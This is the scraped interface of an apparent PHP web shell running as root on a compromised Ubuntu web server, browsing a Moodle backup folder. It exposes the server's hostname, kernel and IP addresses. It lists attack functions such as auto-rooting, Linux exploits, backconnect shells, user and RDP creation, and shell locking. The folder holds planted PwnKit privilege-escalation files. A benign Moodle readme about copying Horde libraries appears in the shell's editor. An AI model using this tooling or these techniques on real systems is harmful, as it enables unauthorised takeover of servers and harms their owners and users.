Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
lib /
horde /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxrwxr-x
locale
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme_moodle.txt
1.03
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
Description of import of Horde libraries # Download the Horde git repository. You will probably want to keep this around for future updates: git clone git@github.com:horde/horde.git # Checkout the version of horde you require: git checkout tags/horde_core-2.30.2 -b last # Copy the following script and store it on /tmp, change it's execute bit, and run it, passing in your path to Horde (the directory you've cloned the repository): /tmp/copyhorde.sh ~/git/ext/horde/ ==== #!/bin/sh source=$1/framework target=./lib/horde echo "Copy Horde modules from $source to $target" modules="Crypt_Blowfish Exception Idna Imap_Client Mail Mime Secret Socket_Client Stream Stream_Filter Stream_Wrapper Support Text_Flowed Translation Util" rm -rf $target/locale $target/framework mkdir -p $target/locale $target/framework/Horde for module in $modules do echo "Copying $module" cp -Rf $source/$module/lib/Horde/* $target/framework/Horde locale=$source/$module/locale if [ -d $locale ] then cp -Rf $locale/* $target/locale fi done
Close